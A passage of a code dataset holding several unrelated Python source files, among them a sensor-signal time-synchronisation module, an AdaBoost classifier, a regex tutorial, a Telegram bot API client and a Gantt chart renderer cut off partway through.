offset\")\n\n return allign_location_search(resampled1, resampled2, true_signal_times, poi1, poi2, similarity_metric, max_start_offset)\n\n@nb.njit\ndef allign_location_search(true_signal, adj_signal, true_signal_times, poi1, poi2, similarity_metric, max_start_offset):\n \"\"\"\n Check how similar the two signals are when aligning based on two points of interest (one in each signal), and\n record the 'most' aligned configuration.\n\n :param true_signal: An ndarray for the resampled signal data which is 'correct'\n :param adj_signal: An ndarray for the resampled signal data which should be adjusted\n :param true_signal_times: The time data associated with the given true_signal\n :param poi1: The points of interest in the 'true' signal to use when lining up the signals\n :param poi2: The points of interest in the 'adjustable' signal to use when lining up the signals\n :param similarity_metric: A function to be used as the similarity metric, or None which defaults to using the\n normalized cross correlation. The function should take in two ndarrays (the two signals to compare), and output a\n NumPy float32, which should be higher the more similar the two signals are.\n :param max_start_offset: The maximum starting time difference to be checked allowed when trying to sync the signals\n :return: A tuple of the same form as the return of the get_aligned_slices function (see it's docstring),\n corresponding to the most aligned slices of data\n \"\"\"\n time_increment = (true_signal_times[-1] - true_signal_times[0]) / (len(true_signal_times) - 1) ####DOUBLE CHECK THE DENOMINATOR######\n\n best_slices = (None, None, None, None, None)\n best_score = np.finfo(np.float32).min\n for loc1 in poi1:\n for loc2 in poi2:\n if abs(loc1 - loc2) * time_increment <= max_start_offset:\n slices = [slice1, slice2, _] = get_aligned_slices(true_signal, adj_signal, true_signal_times, loc1, loc2)\n new_score = similarity_metric(slice1, slice2)\n\n if new_score > best_score:\n best_score = new_score\n best_slices = slices + (loc1, loc2)\n\n return best_slices\n\n\ndef align_signals(true_signal, adjustable_signal, true_sync, adjustable_sync, true_time_signal, adjustable_time_signal,\n true_time_sync, adjustable_time_sync, progress_callback, max_start_offset=None, plot_info=False):\n \"\"\"\n TODO:\n - Plot against time rather than index number\n\n :param true_signal: An ndarray for the signal data which is 'correct'\n :param adjustable_signal: An ndarray for the signal data which should be adjusted\n :param true_sync: The sync signal for the 'correct' signal\n :param adjustable_sync: The sync signal for the adjustable signal\n :param true_time_signal: The times associated with the true_signal data\n :param adjustable_time_signal: The times associated with the adjustable_signal data\n :param true_sample_period: The sampling rate for the 'correct' signal\n :param max_start_offset: The maximum starting time difference to be checked allowed when trying to sync the signals\n :param plot_info: If the original and aligned signals should be plotted by matplotlib\n \"\"\"\n # if plot_info:\n # plt.plot(true_signal)\n # plt.plot(adjustable_signal)\n # plt.title(\"Original Signals\")\n # plt.xlabel(\"Time Steps\")\n # plt.show()\n #\n # plt.plot(true_time_steps, true_signal)\n # plt.plot(adjustable_time_steps, adjustable_signal)\n # plt.title(\"Original Signals\")\n # plt.xlabel(\"Time (s)\")\n # plt.show()\n\n # If the maximum start offset is not given, set it to one fourth of the true signal's length\n if max_start_offset is None:\n max_start_offset = max(true_time_signal[-1] - true_time_signal[0], adjustable_time_signal[-1] - adjustable_time_signal[0]) / 4\n\n true_time_increment = get_sample_period(true_time_signal)\n adjustable_time_increment = get_sample_period(adjustable_time_signal)\n true_sync_period = get_sample_period(true_time_sync)\n adjustable_sync_period = get_sample_period(adjustable_time_sync)\n\n progress_callback(\"Computing sampling frequency error\")\n\n # Calculate the adjustable signal's sampling rate\n sample_rate_ratio = get_sample_rate_ratio(true_sync, adjustable_sync, true_sync_period,\n adjustable_sync_period, plot_info)\n\n actual_adj_sampling_period = adjustable_time_increment / sample_rate_ratio\n\n # Align the signals\n aligned = [truth_aligned, adjustable_aligned, aligned_time_steps, poi1, poi2] = resample_slide_and_compare(\n true_signal,\n adjustable_signal,\n true_time_signal,\n true_time_increment,\n actual_adj_sampling_period,\n progress_callback=progress_callback,\n max_start_offset=max_start_offset,\n plot_info=plot_info)\n\n resampled_sample_period = (aligned_time_steps[-1] - aligned_time_steps[0]) / (len(aligned_time_steps) - 1)\n adj_start_time = aligned_time_steps[0] + (poi1 - poi2) * resampled_sample_period\n\n adj_times_fixed = adj_start_time + actual_adj_sampling_period * np.arange(len(adjustable_time_signal))\n\n if plot_info:\n # The below commented out code plots the resampled data with it's resampled time stamps\n fig, (ax1, ax2) = plt.subplots(2, num=\"Synchronization Results %d\" % (1+max([0] + plt.get_fignums())))\n ax1.plot(true_time_signal, true_signal, label=\"True Signal\")\n ax1.plot(adjustable_time_signal, adjustable_signal, label=\"Adjustable Signal\")\n ax1.set_title(\"Original Data\")\n ax2.plot(true_time_signal, true_signal, label=\"True Signal\")\n ax2.plot(adj_times_fixed, adjustable_signal, label=\"Adjustable Signal\")\n ax2.set_title(\"Synchronized Data\")\n # fig.suptitle(\"Before and After Synchronization\")\n ax1.set(xlabel='Time (s)')\n ax2.set(xlabel='Time (s)')\n ax1.legend()\n ax2.legend()\n plt.tight_layout()\n plt.show(block=False)\n\n return aligned, adj_times_fixed, sample_rate_ratio\n\n\ndef load_csv_data(base_dir):\n \"\"\"\n TODO:\n - Have this take in file path+name for all the files, rather than the base directory\n - Remove this function entirely\n\n :return: A dictionary mapping a signals string identification to the signal's data\n \"\"\"\n filenames = [\"A_Dev_Accel\", \"A_Dev_Sync\", \"S_Dev_Accel\", \"S_Dev_Sync\"]\n database = {}\n for name in filenames:\n ffn = os.path.join(base_dir, name + '.csv')\n npa = np.genfromtxt(ffn, delimiter=',', skip_header=1)\n database[name.lower()] = {'time': npa[:, 0], 'data': npa[:, -1]}\n\n return {\n \"true_signal\": database['a_dev_accel']['data'],\n \"true_sync\": database['a_dev_sync']['data'],\n \"adj_signal\": database['s_dev_accel']['data'],\n \"adj_sync\": database['s_dev_sync']['data'],\n \"true_signal_time\": database['a_dev_accel']['time'],\n \"adj_signal_time\": database['s_dev_accel']['time'],\n \"true_sync_time\": database['a_dev_sync']['time'],\n \"adj_sync_time\": database['s_dev_sync']['time'],\n }\n\ndef new_load_csv_data(filename_dict):\n \"\"\"\n TODO:\n - Have this take in file path+name for all the files, rather than the base directory\n\n :return: A dictionary mapping a signals string identification to the signal's data\n \"\"\"\n database = {}\n for name in filename_dict.values():\n npa = np.genfromtxt(name, delimiter=',', skip_header=1)\n with open(name, 'r') as f:\n has_sync_mask = np.array(list(map(lambda x: \"Sync\" in x, f.readline().split(','))))\n nonzero_indecies = has_sync_mask.nonzero()[0]\n if len(nonzero_indecies) == 0: # If the data is acceleration data\n # Get the magnitude of the x, y, and z accelrations\n database[name] = {'time': npa[:, 0], 'data': np.sqrt(np.sum(npa[:, 1:]**2, axis=1))}\n else:\n data_column = nonzero_indecies[0]\n database[name] = {'time': npa[:, 0], 'data': npa[:, data_column]}\n\n return {\n \"true_signal\": database[filename_dict['true_signal']]['data'],\n \"true_sync\": database[filename_dict['true_sync']]['data'],\n \"adj_signal\": database[filename_dict['adj_signal']]['data'],\n \"adj_sync\": database[filename_dict['adj_sync']]['data'],\n \"true_signal_time\": database[filename_dict['true_signal']]['time'],\n \"adj_signal_time\": database[filename_dict['adj_signal']]['time'],\n \"true_sync_time\": database[filename_dict['true_sync']]['time'],\n \"adj_sync_time\": database[filename_dict['adj_sync']]['time'],\n }\n\n\ndef sync_and_create_new_csv(true_ide_path, adj_ide_path, output_dir, convert_all_channels=True, progress_callback=None, show_signal_plots=False):\n if progress_callback is None:\n progress_callback = lambda x: None\n\n to_convert_to_csv = [true_ide_path, adj_ide_path]\n conversion_executable = \"ide_csv_conversion\\\\ide2csv_64b.exe\"\n bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__)))\n conversion_executable = os.path.join(bundle_dir, conversion_executable)\n\n progress_callback(\"Converting IDE files to CSV\")\n\n # Create csv files for the IDE file\n channels_to_convert = ide_helpers.channels_by_name.keys() if convert_all_channels else [8, 80]\n ide_to_csv_converter = Ide2CsvWrapper(to_convert_to_csv, channels=channels_to_convert,\n converter=conversion_executable, output_path=output_dir)\n ide_to_csv_converter.run()\n\n progress_callback(\"Loading CSV data\")\n\n split_true_ide_name = true_ide_path.split('\\\\')\n split_adj_ide_name = adj_ide_path.split('\\\\')\n\n true_ide_name = split_true_ide_name[-1].split('.')[0]\n adj_ide_name = split_adj_ide_name[-1].split('.')[0]\n\n filename_dict = {\n \"true_signal\": \"%s\\\\%s_Ch80.csv\" % (output_dir, true_ide_name),\n \"true_sync\": \"%s\\\\%s_Ch08.csv\" % (output_dir, true_ide_name),\n \"adj_signal\": \"%s\\\\%s_Ch80.csv\" % (output_dir, adj_ide_name),\n \"adj_sync\": \"%s\\\\%s_Ch08.csv\" % (output_dir, adj_ide_name),\n }\n\n # Load csv data\n data_dict = new_load_csv_data(filename_dict)\n\n # Get synchronized timesteps\n\n _, new_adj_times, sample_rate_ratio = align_signals(\n data_dict['true_signal'], # true_signal\n data_dict['adj_signal'], # adjustable_signal\n data_dict['true_sync'], # true_sync\n data_dict['adj_sync'], # adjustable_sync\n data_dict['true_signal_time'], # true_time_steps\n data_dict['adj_signal_time'], # adjustable_time_steps\n data_dict['true_sync_time'], # true_time_steps\n data_dict['adj_sync_time'], # adjustable_time_steps\n progress_callback=progress_callback,\n plot_info=show_signal_plots,\n )\n\n progress_callback(\"Creating adjusted CSV files\")\n\n time_offset = new_adj_times[0] - data_dict[\"adj_signal_time\"][0]\n\n # build list of adjustable CSV files\n adj_files = [fn for fn in os.listdir(output_dir) if fn.endswith('.csv') and fn.startswith(adj_ide_name) and\n not fn.endswith(\"adjusted.csv\")]\n\n for fn in adj_files:\n with open(os.path.join(output_dir, fn)) as f:\n reader = csv.reader(f)\n new_signal_data = np.array(list(reader))\n#\t\tnew_signal_data[1:, 0] = new_signal_data[1:, 0].astype(np.float)\n start = np.float(new_signal_data[1, 0]) + time_offset\n adjusted_times = new_signal_data[1:, 0].astype(np.float) - np.float(new_signal_data[1, 0])\n adjusted_times /= sample_rate_ratio\n adjusted_times += start\n new_signal_data[1:, 0] = adjusted_times\n\n new_csv_filename = \"%s//%s_adjusted.csv\" % (output_dir, fn[:-4])\n with open(new_csv_filename, 'wb') as f:\t\t# Note: Change to wb for Python2, w for Python3. Python3 also needs to remove \\n\n writer = csv.writer(f)\n writer.writerows(new_signal_data)\n\n","repo_name":"MideTechnology/IDESynchronization","sub_path":"time_sync.py","file_name":"time_sync.py","file_ext":"py","file_size_in_byte":20842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5431103306","text":"from imblearn.over_sampling import SMOTE\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\n\nclass AdaBoost_Detector:\n #Pipeline Normalizzazione e SMOTE\n\n def __init__(self,k_neighbors):\n self.norm=Normalizer(norm='max')\n if k_neighbors>4:\n k_neighbors=5\n self.smote=SMOTE(sampling_strategy='auto', k_neighbors=k_neighbors, random_state=42)\n self.dt_ada=DecisionTreeClassifier(criterion='entropy',splitter='best')\n self.ada=AdaBoostClassifier(base_estimator=self.dt_ada,n_estimators=150,learning_rate=0.1,algorithm='SAMME.R')\n\n def fit(self,X_set,y_set):\n X_set=X_set.to_numpy()\n y_set=y_set.to_numpy()\n X_set=self.norm.fit_transform(X=X_set)\n X_set,y_set=self.smote.fit_resample(X=X_set,y=y_set)\n self.ada.fit(X=X_set,y=y_set)\n\n def predict(self,X_set):\n X_set=X_set.to_numpy()\n X_set=self.norm.transform(X=X_set)\n predict_ada=self.ada.predict(X=X_set)\n return predict_ada","repo_name":"angeloafeltra/FlakyTest_Detection","sub_path":"Classifier_Estimators/AdaBoost_Detector.py","file_name":"AdaBoost_Detector.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30682073950","text":"import re\n\nprint('\\n1--------------------------------------\\n')\n# findall() method \n\nphoneRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\nresume = '''My phone number is 012-797-1844, 013-234-7983, 013-234-7983,\n 012-232-2322, 012-797-1844 and ... .'''\na = phoneRegex.findall(resume)\nprint(a)\nprint('\\n')\n\nphoneRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d)')\nb = phoneRegex.findall(resume)\nprint(b)\nprint('\\n')\n\nphoneRegex = re.compile(r'((\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d))')\nc = phoneRegex.findall(resume)\nprint(c)\n\nprint('\\n2--------------------------------------\\n')\n# character classes\n# '\\d' - any numeric digit from 0 to 9.\n# '\\D' - any character that in not a numeric digit from 0 to 9.\n# '\\w' - any letter, numeric digit, or the underscore character.\n# '\\W' - any character taht is not a letter, numeric digit, or the underscore character.\n# '\\s' - any space, tab, or newline character.\n# '\\S' - any character taht is not a space, tab, or newline character.\n\nlyrics = '''12 drummers drumming, 11 pipers piping, 10 lords a-leaping, 9 ladies dancing,\n8 maids a-milking, 7 swans a-swimming, 6 geese a-laying, 5 golden rings, 4 calling birds, 3 french hens,\n2 turtle doves, and 1 partridge in a pear tree'''\n\nxmasRegex = re.compile(r'\\d+\\s\\w+')\nd = xmasRegex.findall(lyrics)\nprint(d)\n\nvowelRegex = re.compile(r'[aeiou]') # equal to r'[a|e|i|o|u]'\ne = vowelRegex.findall('Alan eats baby food.')\nprint(e) # ['a', 'e', 'a', 'a', 'o', 'o']\n\nvowelRegex = re.compile(r'[aeiouAEIOU]') # with capital 'aeiou'\nf = vowelRegex.findall('Alan eats baby food.')\nprint(f) # ['A', 'a', 'e', 'a', 'a', 'o', 'o']\n\nvowelRegex = re.compile(r'[aeiouAEIOU]{2}') # double vowel\ng = vowelRegex.findall('Alan eats baby food.')\nprint(g) # ['ea', 'oo']\n\nvowelRegex = re.compile(r'[^aeiouAEIOU]') # '^' mean not [aeiouAEIOU]\nh = vowelRegex.findall('Alan eats baby food.')\nprint(h) # ['l', 'n', ' ', 't', 's', ' ', 'b', 'b', 'y', ' ', 'f', 'd', '.']\n","repo_name":"AlanTeeWeiLoon/Python-Programming-Fundamental-for-Beginner-","sub_path":"Section 10 - Regular Expressions/regex_charactetr_classes_and_the_findall()_method.py","file_name":"regex_charactetr_classes_and_the_findall()_method.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"859367522","text":"import requests\nimport json\n\nBASE_URL = \"https://obunaedu.mamatmusayev.uz\"\n\n######## createuser ############\ndef create_user(telegram_id, telegram_full_name, telegram_username, telegram_phone_number):\n context = {\n \"telegram_id\": telegram_id,\n \"telegram_full_name\":telegram_full_name,\n \"telegram_username\":telegram_username,\n \"telegram_phone_number\":telegram_phone_number,\n \"promo_code\":'',\n \"is_active\": True\n }\n response = requests.post(f\"{BASE_URL}/api/botuser/\", data = context)\n # print(response.text)\n return response.status_code\n\ndef get_user(telegram_id):\n response = requests.get(f\"{BASE_URL}/api/botuser/{telegram_id}/\")\n data = json.loads(response.text)\n return {\"data\": data, \"status_code\": response.status_code}\n\ndef get_all_users():\n response = requests.get(f\"{BASE_URL}/api/botuser/\")\n data = json.loads(response.text)\n return data\n\ndef update_promo_code(telegram_id, promo_code):\n context = {\n \"telegram_id\": telegram_id,\n \"promo_code\": promo_code\n }\n response = requests.patch(f\"{BASE_URL}/api/botuser/{telegram_id}/\", data = context)\n # print(response.text)\n data = json.loads(response.text)\n return data\n\ndef check_promo_code(promo_code):\n response = requests.get(f\"{BASE_URL}/api/promo/{promo_code}/\")\n data = json.loads(response.text)\n return {\"data\": data, \"status_code\": response.status_code}\n\n \ndef create_order(check_id, telegram_id, full_name, phone_number, email, total_price, promo_code, is_paid):\n context = {\n \"check_id\": check_id,\n \"user\": telegram_id,\n \"full_name\":full_name,\n \"phone_number\":phone_number,\n \"email\":email,\n \"total_price\":total_price,\n \"promo_code\":promo_code,\n \"is_paid\": is_paid\n \n }\n \n response = requests.post(f\"{BASE_URL}/api/order/create/\", data = context)\n return response.status_code\n\n### create user complate\n# s = create_user(2079362883, \"jaloliddin\", \"usename\", \"+99995523255\")\n# print(s)\n# s = create_user(\n# telegram_id=973108256,\n# telegram_full_name=\"jaloliddin\",\n# telegram_username=\"usename\",\n# telegram_phone_number=\"+99995523255\"\n \n# )\n# print(s)\n# #### get user test is complate success\n# n = get_user(973108256)\n# if n['status_code'] != 200:\n# print(\"not working\")\n# else:\n# print(n)\n\n## get all users success\n# all = get_all_users()\n# print(all)\n\n### promo code update success\n# promo = update_promo_code(234234234, '')\n# print(promo)\n\n\n#### check promo code is success\n# promo = check_promo_code(\"baxa\")\n# print(promo)\n\n\n## create order \n# order = create_order(\"8930795580093228429\", 973108256, \"jaloliddin\", \"+99995523255\", \"email@gmail.com\", 10000000, \"baxa\", True)\n# print(order)","repo_name":"jaloliddin1006/videocoursebot","sub_path":"bot/data/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16577260704","text":"import linecache\r\n\r\ndef group_table(filepath,lineSpan,k_th_oracle=1):\r\n initline=(k_th_oracle-1)*lineSpan\r\n grouped_table=dict()\r\n for i in range(4,lineSpan+1):\r\n tmp = linecache.getline(filepath, initline+i)\r\n if (i-4)%2==0:\r\n grouptmp=tmp.split(\" \")\r\n groupkey=eval(grouptmp[0])\r\n elif (i-4)%2==1:\r\n totalstr=tmp.split(\"table without scaler:\")\r\n total=eval(totalstr[1])\r\n grouped_table[groupkey]=total\r\n\r\n return grouped_table\r\n\r\nif __name__ == '__main__':\r\n print(group_table(\"experiments//adult_1_PGRR_results.txt\", 23))","repo_name":"Leaflowave/PrivCQ","sub_path":"oraclegenerator/group_table4PGRR.py","file_name":"group_table4PGRR.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74781546405","text":"from projman.lib import date_range\nfrom projman.lib.constants import HOURS_PER_DAY\nfrom projman.renderers.abstract import \\\n AbstractRenderer, AbstractDrawer, TODAY, \\\n TITLE_COLUMN_WIDTH, FIELD_COLUMN_WIDTH, ROW_HEIGHT, oneDay\nfrom logilab.common.tree import NodeNotFound\nfrom mx.DateTime import oneHour\n\nclass GanttRenderer(AbstractRenderer) :\n \"\"\"\n Render a Gantt diagram\n \"\"\"\n\n def __init__(self, options, handler, colors_file=None, colors_stream=None) :\n AbstractRenderer.__init__(self, options)\n self.drawer = GanttDrawer(options, handler, colors_file, colors_stream)\n\n def render(self, task, stream):\n \"\"\"\n render the task as a gantt diagram\n \"\"\"\n AbstractRenderer.render(self, task, stream)\n self.drawer._handler.save_result(stream)\n\n def _render_body(self, project) :\n \"\"\"\n generate events to draw a Gantt diagram for the task description\n\n concrete renderer should use the 'write' method or override this method\n to return the generated content.\n \"\"\"\n self.drawer.main_title('Gantt diagram')\n # XXX TODO: get rid of these coords hacks in self.drawer\n # we must *not* use a state machine anymore, IMHO\n x_ = self.drawer._x\n self.drawer.draw_timeline()\n self.drawer.close_line()\n\n y_min = self.drawer._y\n\n self.render_node(project.root_task, project)\n\n y_max = self.drawer._y\n first_day = self.drawer._timeline_days[0]\n last_day = self.drawer._timeline_days[-1]+self.drawer._timestep\n rnge = self.drawer._timeline_all_days\n self.drawer.draw_separator_gantt(x_, y_min, y_max)\n self.drawer.draw_weekends_bg(x_, y_min, y_max)\n\n real_tasks = project.root_task.leaves()\n for task in self._pending_constraints:\n for c_type, c_id, priority in task.task_constraints:\n try:\n ct = task.get_node_by_id(c_id)\n except NodeNotFound :\n # XXX task might be a grouping task...\n if (c_type == \"begin-after-end-previous\" and\n real_tasks.index(task) != 0):\n # find the previous task to connect to\n ct = real_tasks[real_tasks.index(task) - 1]\n print (task.id, c_type, ct.id)\n else:\n print (\"Gantt Error: Can not draw constraint \"\n \"'%s %s %s'\" % (task.id, c_type, c_id))\n continue\n if ct in self._visible_tasks:\n self.drawer.task_constraints(c_type, task, ct, project.factor)\n\n def render_node(self, node, project):\n \"\"\"\n render self and children\n \"\"\"\n # hide task under the depth limit\n if self.options.depth and node.depth() >= self.options.depth :\n return\n\n begin_p, end_p = project.get_task_date_range(node)\n # hide task out of the time line\n if begin_p and end_p:\n if end_p < self.drawer._timeline_days[0] or \\\n begin_p > self.drawer._timeline_days[-1]:\n return\n\n if node.TYPE == 'milestone':\n self.render_milestone(node, project)\n else:\n self.render_task(node, project)\n # render subtasks\n if node.children:\n for node_child in node.children:\n self.render_node(node_child, project)\n\n def render_task(self, task, project):\n \"\"\"\n generate event for a given task\n \"\"\"\n if self.options.del_ended and task.is_finished():\n return\n self._begin_render_task_or_milestone(task, project)\n\n task_begin, task_end = project.get_task_date_range(task)\n task_end -= oneHour * HOURS_PER_DAY / project.factor\n self.drawer.task_timeline_bg()\n if task.children:\n self.drawer.render_root_task(task, task_begin, task_end, project)\n else:\n self.drawer.render_leaf_task(task, task_begin, task_end, project)\n\n self.drawer.close_timeline()\n if self.options.rappel:\n self.drawer.main_content(task.title or task.id,\n project, task.depth(), task)\n # close table row\n self.drawer.close_line()\n\n\n def render_milestone(self, milestone, project):\n \"\"\"\n generate event for a given milestone\n \"\"\"\n self._begin_render_task_or_milestone(milestone, project)\n\n # print task calendar\n for d in self.drawer._timeline_days:\n self.drawer.milestone_timeline(d, milestone, project)\n self.drawer.close_timeline()\n\n if self.options.rappel:\n self.drawer.main_content(milestone.title or milestone.id,\n project, depth, milestone)\n # close table row\n self.drawer.close_line()\n\n def _begin_render_task_or_milestone(self, task, project):\n \"\"\"common steps for begin of rendering task or milestone\"\"\"\n self.drawer.set_color_set(self._i)\n self._i += 1\n self._visible_tasks[task] = 1\n for val in task.task_constraints:\n if val:\n self._pending_constraints[task] = 1\n break\n self.drawer.open_line()\n self.drawer.main_content(task.title or task.id,\n project, task.depth(), task)\n if self.options.showids:\n self.drawer.simple_content(task.title)\n\n\nclass GanttDrawer(AbstractDrawer) :\n \"\"\"\n Draw a Gantt diagram\n \"\"\"\n\n ## AbstractDrawer interface #############################################\n\n def _init_table(self):\n \"\"\"\n initialize fields needed by the table\n \"\"\"\n AbstractDrawer._init_table(self)\n # mapping to save tasks coordonates\n self._tasks_slots = {}\n # current task\n self._ctask = None\n\n def _get_table_dimension(self, project):\n \"\"\"\n calculate dimension of the table\n \"\"\"\n #calculate width\n width = TITLE_COLUMN_WIDTH\n if self.options.rappel:\n width *= 2\n if self.options.showids :\n width += FIELD_COLUMN_WIDTH*1\n if 0 and self.options.detail > 1 :\n width += FIELD_COLUMN_WIDTH*2\n if 0 and self.options.detail > 0 :\n width += FIELD_COLUMN_WIDTH*4\n width += len(self._timeline_days)*self._timestepwidth\n #calculate height\n height = ROW_HEIGHT * (5 + project.get_nb_tasks())\n return (width, height)\n\n # project table head/tail #################################################\n\n def legend(self):\n \"\"\"\n write the diagram's legend of tasks\n \"\"\"\n self._legend_task()\n\n # project table content ###################################################\n\n def render_leaf_task(self, task, task_begin, task_end, project):\n factor = project.factor\n width = self._daywidth / factor\n ddays = (task_begin - self._timeline_days[0]).days\n x = self._x + width * (ddays * factor)\n w = ((task_end-task_begin).days + 1) * width * factor\n self._handler.draw_rect(x,\n self._y+0+ROW_HEIGHT*0.125,\n max(w+0, 0),\n ROW_HEIGHT*0.75+0, fillcolor=self._color)\n coords = self._tasks_slots.setdefault(self._ctask, [])\n coords.extend( [(x-width/2, self._y), (x-width/1+max(w+0, 0), self._y)] )\n\n # be sure weekends do not seems to be working days\n day = task_begin\n while day <= task_end:\n if day.day_of_week in (5,6):\n self._handler.draw_rect(x,\n self._y+1,\n self._daywidth,\n ROW_HEIGHT-2, fillcolor=self._color_set['WEEKDAY'])\n day += oneDay\n x += self._daywidth\n\n\n\n def render_root_task(self, task, task_begin, task_end, project):\n factor = project.factor\n width = self._daywidth / factor\n ddays = (task_begin - self._timeline_days[0]).days\n x = self._x + width * (ddays * factor)\n w = ((task_end-task_begin).days + 1) * width * factor\n\n line_width = (ROW_HEIGHT/12.)\n y = self._y+5*line_width\n end_width = ROW_HEIGHT/4\n r_x = x\n r_width = w\n\n # XXX TODO\n #if task.link:\n # self.open_link(task.link)\n\n # XXX TODO: merge these 3 paths in one poly\n self._handler.draw_rect(r_x, y, max(r_width, 0),\n ROW_HEIGHT-10*line_width, fillcolor=self._color)\n\n self._handler.draw_poly(((x, y),\n (x+end_width, y),\n (x, y+ROW_HEIGHT*7/12)),\n fillcolor=self._color)\n r_width -= 5\n r_x = x + w\n self._handler.draw_poly(((r_x, y),\n (r_x-end_width, y),\n (r_x, y+ROW_HEIGHT*7/12)),\n fillcolor=self._color)\n\n #if task.link:\n # self.close_link()\n coords = self._tasks_slots.setdefault(self._ctask, [])\n coords.extend( [(x-width/2, self._y), (x + r_width, self._y)] )\n\n def task_timeline_bg(self):\n \"\"\"Draw the background of a timeline\"\"\"\n rnge = self._timeline_all_days\n first_day = rnge[0]\n last_day = rnge[-1]+self._timestep\n # XXX This is useless...\n daywidth = self._daywidth\n # first draw one big rectangle\n self._handler.draw_rect(self._x, self._y+1, daywidth*len(rnge),\n ROW_HEIGHT-2, fillcolor=self._color_set['WEEKDAY'])\n # draw today\n if TODAY.day_of_week not in (5,6) and first_day <= TODAY <= last_day:\n n = int((TODAY - first_day).days)\n self._handler.draw_rect(self._x+n*daywidth, self._y+1,\n daywidth, ROW_HEIGHT-2,\n fillcolor=self._color_set['TODAY'])\n\n def draw_weekends_bg(self, x_min, y_min, y_max):\n rnge = self._timeline_all_days\n daywidth = self._daywidth\n #bgcolor = self._color_set['WEEKEND']\n bgcolor = (100,0,0,50)\n first_day = rnge[0]\n last_day = rnge[-1]\n n0 = (12 - first_day.day_of_week)%7\n for i in range(n0, len(rnge), 7):\n self._handler.draw_rect(x_min+i*daywidth, y_min,\n 2*daywidth, y_max-y_min,\n fillcolor=bgcolor)\n\n def draw_separator_gantt(self, x_min, y_min, y_max, rnge=None):\n if rnge == None:\n rnge = self._timeline_all_days\n daywidth = self._daywidth\n color = (204,204,204)\n if self._timestep == 1:\n for n in range(len(rnge)):\n self._handler.draw_line(x_min+n*daywidth, y_min-ROW_HEIGHT,\n x_min+n*daywidth, y_max+ROW_HEIGHT,\n color=color)\n self._handler.draw_dot(x_min+(n+0.5)*daywidth, y_min,\n x_min+(n+0.5)*daywidth, y_max,\n 4,\n color=color)\n elif self._timestep == 7:\n for n,day in enumerate(rnge):\n if day.day_of_week == 0:\n self._handler.draw_line(x_min+n*daywidth, y_min-ROW_HEIGHT,\n x_min+n*daywidth, y_max+ROW_HEIGHT,\n color=color)\n else:\n self._handler.draw_dot(x_min+n*daywidth, y_min,\n x_min+n*daywidth, y_max,\n 4,\n color=color)\n\n else: # timestep == month\n for n,day in enumerate(rnge):\n if day.day == 1:\n self._handler.draw_line(x_min+n*daywidth, y_min-ROW_HEIGHT,\n x_min+n*daywidth, y_max+ROW_HEIGHT,\n color=color)\n #elif day.day_of_week == 0:\n # self._handler.draw_dot(self._x+n*daywidth, self._y,\n # self._x+n*daywidth, self._y+ROW_HEIGHT,\n # 4,\n # color=(204,204,204))\n # les pointilles genent la lecture du graphe\n\n def milestone_timeline(self, day, milestone, project):\n \"\"\"\n Iterate over each day to draw corresponding milestone\n \"\"\"\n self._ctask = milestone\n last_day = day + self._timestep\n begin, end = project.get_task_date_range(milestone)\n assert begin == end\n for day in date_range(day, last_day):\n draw = (day == begin)\n self._milestone_timeline(day, draw, project.factor)\n\n def _milestone_timeline(self, day, draw, factor):\n \"\"\"\n Effectively draw a milestone\n \"\"\"\n # background color\n if day.date == TODAY.date :\n bgcolor = self._color_set['TODAY']\n elif day.day_of_week in (5, 6):\n bgcolor = self._color_set['WEEKEND']\n else:\n bgcolor = self._color_set['WEEKDAY']\n\n width = self._daywidth\n first_day = self._timeline_days[0]\n last_day = self._timeline_days[-1]+self._timestep\n rnge = list( date_range( first_day, last_day ) )\n self._handler.draw_rect(self._x, self._y, max(width, 0),\n ROW_HEIGHT, fillcolor=bgcolor)\n self.draw_separator_gantt(self._x, self._y, self._y, rnge=[day])\n\n # draw milestone as diamond\n if draw:\n x, y = self._x, self._y\n self._tasks_slots.setdefault(self._ctask, []).append((x, y))\n self._handler.draw_poly(((x+(width-1)/factor, y+ROW_HEIGHT/2), # right\n (x+width/(2*factor), y+ROW_HEIGHT*3/4), # top\n (x+1, y+ROW_HEIGHT/2), # left\n (x+width/(2*factor), y+ROW_HEIGHT/4)), # bottom\n fillcolor=self._colors['CONSTRAINT'])\n # record position\n self._x += width\n\n def task_constraints(self, type_constraint, task, constraint_task, factor):\n \"\"\"\n draw a constraint between from task to constraint_task\n \"\"\"\n # check that constrained task is in the diagram\n if not self._tasks_slots.has_key(constraint_task) or \\\n not self._tasks_slots.has_key(task):\n return\n if type_constraint.startswith('begin'):\n index1 = 0\n offset1 = 0\n else:\n index1 = -1\n offset1 = self._daywidth\n if type_constraint.endswith('begin'):\n index2 = 0\n offset2 = 0\n else:\n index2 = -1\n offset2 = self._daywidth / factor\n x1, y1 = self._tasks_slots[task][index1]\n x1 += offset1\n y1 += ROW_HEIGHT/2\n x2, y2 = self._tasks_slots[constraint_task][index2]\n x2 += offset2\n y2 += ROW_HEIGHT/2\n # split line according to differents configuration\n # just for a better visibility\n if x1 > x2:\n x_ = (x1+x2) / 2\n points = ((x1,y1), (x_,y1), (x_,y2), (x2,y2))\n else:\n if y2 <= y1:\n sign = -1.0\n else:\n sign = +1.0\n points = ((x2,y2),\n (x2+FIELD_COLUMN_WIDTH/3, y2),\n (x2+FIELD_COLUMN_WIDTH/3, y1 + sign*ROW_HEIGHT/2),\n (x1-FIELD_COLUMN_WIDTH/3, y1 + sign*ROW_HEIGHT/2),\n (x1-FIELD_COLUMN_WIDTH/3, y1),\n (x1, y1))\n self._handler.draw_poly(points, 